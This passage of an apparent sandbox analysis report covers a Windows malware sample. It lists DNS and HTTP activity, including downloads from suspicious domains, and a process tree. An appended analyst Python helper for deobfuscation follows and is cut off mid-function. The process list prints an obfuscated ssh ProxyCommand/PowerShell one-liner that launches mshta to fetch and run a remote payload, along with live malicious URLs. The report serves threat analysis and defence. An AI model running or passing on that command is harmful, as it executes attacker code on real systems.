                                                                                                   Dec 17, 2024 08:48:04.220475912 CET | 1.1.1.1 | 192.168.2.5 | 0x477f | No error (0) | cndef1.green-pathways.shop | | 104.21.83.229 | A (IP address) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:04.220475912 CET | 1.1.1.1 | 192.168.2.5 | 0x477f | No error (0) | cndef1.green-pathways.shop | | 172.67.182.220 | A (IP address) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:10.466924906 CET | 1.1.1.1 | 192.168.2.5 | 0x6551 | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:10.466924906 CET | 1.1.1.1 | 192.168.2.5 | 0x6551 | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:10.466924906 CET | 1.1.1.1 | 192.168.2.5 | 0x6551 | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:19.570688009 CET | 1.1.1.1 | 192.168.2.5 | 0xaf21 | No error (0) | www.360.net | | 180.163.242.102 | A (IP address) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:19.570732117 CET | 1.1.1.1 | 192.168.2.5 | 0xaf21 | No error (0) | www.360.net | | 180.163.242.102 | A (IP address) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:23.845731020 CET | 1.1.1.1 | 192.168.2.5 | 0x5e87 | No error (0) | 360.net | | 180.163.242.102 | A (IP address) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:23.845766068 CET | 1.1.1.1 | 192.168.2.5 | 0x5e87 | No error (0) | 360.net | | 180.163.242.102 | A (IP address) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:25.398355961 CET | 1.1.1.1 | 192.168.2.5 | 0x72a1 | No error (0) | www.baidu.com | www.a.shifen.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:25.398355961 CET | 1.1.1.1 | 192.168.2.5 | 0x72a1 | No error (0) | www.a.shifen.com | www.wshifen.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:25.398355961 CET | 1.1.1.1 | 192.168.2.5 | 0x72a1 | No error (0) | www.wshifen.com | | 103.235.47.188 | A (IP address) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:25.398355961 CET | 1.1.1.1 | 192.168.2.5 | 0x72a1 | No error (0) | www.wshifen.com | | 103.235.46.96 | A (IP address) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:29.660840988 CET | 1.1.1.1 | 192.168.2.5 | 0xe1d9 | No error (0) | berb.fitnessclub-filmfanatics.com | | 104.21.66.20 | A (IP address) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:29.660840988 CET | 1.1.1.1 | 192.168.2.5 | 0xe1d9 | No error (0) | berb.fitnessclub-filmfanatics.com | | 172.67.155.79 | A (IP address) | IN (0x0001) | false
                                                                                                  • cndef1.green-pathways.shop
                                                                                                  • pastebin.com
                                                                                                  • www.360.net
                                                                                                  • www.baidu.com
                                                                                                  • berb.fitnessclub-filmfanatics.com
                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                   0 | 192.168.2.5 | 49704 | 104.21.83.229 | 443 | 5416 | C:\Windows\System32\mshta.exe
                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                   2024-12-17 07:48:05 UTC | 343 | OUT | GET /api/reg/z.mp4 HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-CH
                                                                                                  UA-CPU: AMD64
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                  Host: cndef1.green-pathways.shop
                                                                                                  Connection: Keep-Alive
                                                                                                   2024-12-17 07:48:06 UTC | 884 | IN | HTTP/1.1 200 OK
                                                                                                  Date: Tue, 17 Dec 2024 07:48:05 GMT
                                                                                                  Content-Type: video/mp4
                                                                                                  Content-Length: 397568
                                                                                                  Connection: close
                                                                                                  Last-Modified: Thu, 28 Nov 2024 19:47:59 GMT
                                                                                                  ETag: "6748c8ef-61100"
                                                                                                  Accept-Ranges: bytes
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6oTQMFWA9peteqdayNSxuFeAETuHNEM6L%2BlQzzgxOUalteMJqYJDXMIm3G%2FWF087PV%2BXBJ2zI0wQwx6N2WdaBcU4FhSrf0tjlopuUCX1NOT8P16y7lTRiVFj%2FTjpu8%2FYY66aMlL7ZX%2FY3hljKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8f354f0fe8fa42b1-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2138&min_rtt=2126&rtt_var=822&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=925&delivery_rate=1310592&cwnd=211&unsent_bytes=0&cid=60edf534014a9f01&ts=681&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  49708        172.67.19.24    443               6568  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-17 07:48:11 UTC  169                OUT
    GET /raw/0v6Vhvpb HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: pastebin.com
    Connection: Keep-Alive
2024-12-17 07:48:12 UTC  388                IN
    HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 07:48:12 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    cache-control: public, max-age=1801
    CF-Cache-Status: MISS
    Last-Modified: Tue, 17 Dec 2024 07:48:12 GMT
    Server: cloudflare
    CF-RAY: 8f354f370e9e32ca-EWR


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
2           192.168.2.5  49715        180.163.242.102  443               6568  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-17 07:48:21 UTC  61                 OUT
    GET / HTTP/1.1
    Host: www.360.net
    Connection: Keep-Alive
2024-12-17 07:48:22 UTC  238                IN
    HTTP/1.1 301 Moved Permanently
    Server: nginx/1.21.5
    Date: Tue, 17 Dec 2024 07:48:21 GMT
    Content-Type: text/html
    Content-Length: 169
    Connection: close
    Location: https://360.net/
    Content-Security-Policy: upgrade-insecure-requests
2024-12-17 07:48:22 UTC  169                IN
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.21.5</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.5  49728        103.235.47.188  443               6568  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-17 07:48:27 UTC  63                 OUT
    GET / HTTP/1.1
    Host: www.baidu.com
    Connection: Keep-Alive
2024-12-17 07:48:28 UTC  987                IN
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Cache-Control: no-cache
    Content-Length: 29638
    Content-Type: text/html
    Date: Tue, 17 Dec 2024 07:48:27 GMT
    P3p: CP=" OTI DSP COR IVA OUR IND COM "
    P3p: CP=" OTI DSP COR IVA OUR IND COM "
    Pragma: no-cache
    Server: BWS/1.1
    Set-Cookie: BAIDUID=50ECEEF58E525CF3C6F456DF5DB2FEA5:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
    Set-Cookie: BIDUPSID=50ECEEF58E525CF3C6F456DF5DB2FEA5; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
    Set-Cookie: PSTM=1734421707; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
    Set-Cookie: BAIDUID=50ECEEF58E525CF377C9565FF25296D7:FG=1; max-age=31536000; expires=Wed, 17-Dec-25 07:48:27 GMT; domain=.baidu.com; path=/; version=1; comment=bd
    Traceid: 1734421707048131073011640286867167773022
    Vary: Accept-Encoding
    X-Ua-Compatible: IE=Edge,chrome=1
    X-Xss-Protection: 1;mode=block
    Connection: close
2024-12-17 07:48:28 UTC | 192 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22
                                                                                                  Data Ascii: <!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta content="
2024-12-17 07:48:28 UTC | 320 | IN | Data Raw: 61 6c 77 61 79 73 22 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 0a 20 20 20 20 20 20 20 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 e5 85 a8 e7 90 83 e9 a2 86 e5 85 88 e7 9a 84 e4 b8 ad e6 96 87 e6 90 9c e7 b4 a2 e5 bc 95 e6 93 8e e3 80 81 e8 87 b4 e5 8a 9b e4 ba 8e e8 ae a9 e7 bd 91 e6 b0 91 e6 9b b4 e4 be bf e6 8d b7 e5 9c b0 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af ef bc 8c e6 89 be e5 88 b0 e6 89 80 e6 b1 82 e3 80 82 e7 99 be e5 ba a6 e8 b6 85 e8 bf 87 e5 8d 83 e4 ba bf e7 9a 84 e4 b8 ad e6 96 87 e7 bd 91 e9 a1 b5 e6 95 b0 e6 8d ae e5 ba 93 ef bc 8c e5 8f af e4 bb a5 e7 9e ac e9 97 b4 e6 89 be e5 88 b0 e7 9b b8 e5 85 b3 e7 9a 84 e6 90 9c e7 b4 a2
                                                                                                  Data Ascii: always" name="referrer" /> <meta name="description" content="
2024-12-17 07:48:28 UTC | 3537 | IN | Data Raw: 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 0a 20 20 20 20 20 20 20 20 72 65 6c 3d 22 73 65 61 72 63 68 22 0a 20 20 20 20 20 20 20 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 70 65 6e 73 65 61 72 63 68 64 65 73 63 72 69 70 74 69 6f 6e 2b 78 6d 6c 22 0a 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 62 61 69 64 75 2e 63 6f 6d 2f 63 6f 6e 74 65 6e 74 2d 73 65 61 72 63 68 2e 78 6d 6c 22 0a 20 20 20 20 20 20 20 20 74 69 74 6c 65 3d 22 e7 99 be e5 ba a6 e6 90 9c e7 b4 a2 22 0a 20 20 20 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 99 be e5 ba a6 e4 b8 80 e4 b8 8b ef bc 8c e4 bd a0 e5 b0 b1 e7 9f a5 e9 81 93 3c 2f 74 69 74 6c
                                                                                                  Data Ascii: .com/favicon.ico" type="image/x-icon" /> <link rel="search" type="application/opensearchdescription+xml" href="//www.baidu.com/content-search.xml" title="" /> <title></titl
2024-12-17 07:48:28 UTC | 4716 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2a 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 77 72 61 70 70 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 31 32 35 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 68 65 61 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a
                                                                                                  Data Ascii: padding-bottom: 100px; text-align: center; *z-index: 1; } #wrapper { min-width: 1250px; height: 100%; min-height: 600px; } #head { position:
2024-12-17 07:48:28 UTC | 5895 | IN | Data Raw: 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 36 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 73 2d 68 6f 74 73 65 61 72 63 68 2d 77 72 61 70 70 65 72 20 2e 73 2d 68 6f 74 73 65 61 72 63 68 2d 63 6f 6e 74 65 6e 74 20 2e 68 6f 74 73 65 61 72 63 68 2d 69 74 65 6d 2e 6f 64 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 73 2d 68 6f 74 73 65 61 72 63 68 2d 77 72 61 70 70 65 72 20 2e 73 2d 68 6f 74 73 65 61 72 63 68 2d 63 6f 6e 74 65 6e 74 20 2e 68 6f 74 73 65 61 72 63 68 2d 69 74 65 6d 2e 65 76 65 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                  Data Ascii: line-height: 36px; } #s-hotsearch-wrapper .s-hotsearch-content .hotsearch-item.odd { margin-right: 20px; clear: both; } #s-hotsearch-wrapper .s-hotsearch-content .hotsearch-item.even {
2024-12-17 07:48:28 UTC | 7074 | IN | Data Raw: 20 20 20 20 20 20 23 62 6f 74 74 6f 6d 5f 6c 61 79 65 72 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 62 6f 74 74 6f 6d 5f 6c 61 79 65 72 20 2e 73 2d 62 6f 74 74 6f 6d 2d 6c 61 79 65 72 2d 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 63 49 63 6f 6e 66 6f 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3a 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 70 73 73 2e 62 64 73 74 61 74 69
                                                                                                  Data Ascii: #bottom_layer a:hover { color: #222; } #bottom_layer .s-bottom-layer-content { text-align: center; } @font-face { font-family: cIconfont; src: url('https://pss.bdstati


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49739 | 104.21.66.20 | 443 | 6568 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 07:48:30 UTC | 94 | OUT | GET /naailq0.cpl HTTP/1.1
                                                                                                  Host: berb.fitnessclub-filmfanatics.com
                                                                                                  Connection: Keep-Alive
2024-12-17 07:48:31 UTC | 578 | IN | HTTP/1.1 403 Forbidden
                                                                                                  Date: Tue, 17 Dec 2024 07:48:31 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oll0ScsLPkgKbJza0MKzrcTGwOEAEuKqAPlZpOwSd96YFxxyp0q0fOWAV4Ty6gLU1hn8PwekCV0TJDkM2MYp%2Fn8lOaSGFHwFt9QKHSeAlDTegho8YD0nYmujAgB%2FfyG6OMNW%2FvptkRH7FfjZXXkEcPMneAU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8f354faebfd84391-EWR
2024-12-17 07:48:31 UTC | 791 | IN | Data Raw: 31 31 63 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                  Data Ascii: 11cc<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-12-17 07:48:31 UTC | 1369 | IN | Data Raw: 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f
                                                                                                  Data Ascii: css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = do
2024-12-17 07:48:31 UTC | 1369 | IN | Data Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                  Data Ascii: > <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a>
2024-12-17 07:48:31 UTC | 1035 | IN | Data Raw: 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73
                                                                                                  Data Ascii: d="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item s
2024-12-17 07:48:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Target ID:0
                                                                                                  Start time:02:48:00
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\OpenSSH\ssh.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')" .
                                                                                                  Imagebase:0x7ff6cf660000
                                                                                                  File size:946'176 bytes
                                                                                                  MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:1
                                                                                                  Start time:02:48:00
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:2
                                                                                                  Start time:02:48:00
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')
                                                                                                  Imagebase:0x7ff7be880000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true
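Added analyst helper, not part of the Joe Sandbox report or of the sample: it reproduces the two layers recorded for Target ID 0 and Target ID 2 (the ssh.exe -o ProxyCommand wrapper, then the PowerShell ('...' -replace ']') string expression) so the padded literal can be turned back into the mshta.exe command line the sandbox later recorded for Target ID 4. The command lines are copied from this report; the regex names, the dictionary keys and the heuristic flags are this script's own.

```python
"""Deobfuscate an ssh.exe ProxyCommand -> powershell -Command ('literal' -replace 'pat') chain."""
import re
from urllib.parse import urlparse

# Obfuscated literal exactly as recorded in the Target ID 0 / Target ID 2 command lines.
OBF = ("m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]"
       "f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]"
       "/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]")
PS_CMDLINE = f"powershell powershell -Command ('{OBF}' -replace ']')"          # Target ID 2
SSH_CMDLINE = f'"C:\\Windows\\System32\\OpenSSH\\ssh.exe" -o ProxyCommand="{PS_CMDLINE}" .'  # Target ID 0

PROXYCMD_RE = re.compile(r'ProxyCommand="(?P<cmd>[^"]*)"')
# ( 'literal' -replace 'pattern' [, 'replacement'] ) with single-quoted (non-interpolating) strings.
REPLACE_RE = re.compile(
    r"\(\s*'(?P<lit>[^']*)'\s+-replace\s+'(?P<pat>[^']*)'(?:\s*,\s*'(?P<rep>[^']*)')?\s*\)"
)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")
# Extensions mshta will happily run an HTA from; anything else (z.mp4 here) is a disguise heuristic.
MSHTA_EXPECTED_EXT = (".hta", ".htm", ".html")


def unwrap_proxycommand(cmdline):
    """Return the command ssh.exe would spawn through -o ProxyCommand, or the input unchanged."""
    m = PROXYCMD_RE.search(cmdline)
    return m.group("cmd") if m else cmdline


def apply_replace(literal, pattern, replacement=""):
    """PowerShell's -replace is regex-based; Python's re treats a lone ']' as a literal just as .NET does.
    If the pattern is not valid for Python's re, fall back to a plain substring replace."""
    try:
        return re.sub(pattern, replacement, literal)
    except re.error:
        return literal.replace(pattern, replacement)


def deobfuscate(cmdline):
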